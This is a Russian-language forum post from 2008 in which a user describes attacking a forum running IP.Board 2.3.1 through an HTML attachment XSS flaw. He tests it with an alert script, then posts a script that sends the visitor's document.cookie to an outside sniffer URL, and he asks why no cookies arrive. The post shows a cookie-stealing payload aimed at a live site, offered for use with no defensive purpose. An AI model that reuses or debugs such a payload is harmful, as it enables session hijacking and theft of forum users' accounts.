HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Помогите с аттачем
  #1  
Старый 21.08.2008, 14:15
Zipper-rus
Познающий
Регистрация: 06.06.2008
Сообщений: 43
С нами: 9436035

Репутация: 9
По умолчанию Помогите с аттачем

Кароче есть форум IP.Board 2.3.1 , я нашёл на этом форуме уязвимость подходящая под эту версию. Вот она :
http://forum.antichat.ru/showpost.php?p=695836&postcount=22

Кароче я прочитал зашёл на сайт и оставил пост туда прицепил файл (аттачем) , как и написано назвал any.html , и туда вписал <script>alert(/Hello/)</script> .

В итоге пост с файлом создался , и я перешёл по линку прикреплённого файла .html, Алерт сработал и я увидел (Hello). После удалил <script>alert(/Hello/)</script> и вписал <script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> , теперь переходу по файлу файл загружается пустым , сматрю исходный текст в IE , и вижу что скрипт в файле есть , но в сниффере тишина (( Подскажите что я неправильно сделал и что нужно исправить ??
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите написать программу на С++, генератор массива neon17 С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 3 20.01.2008 23:05
Помогите с вышкой. PomaH9991 Болталка 27 16.12.2007 23:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.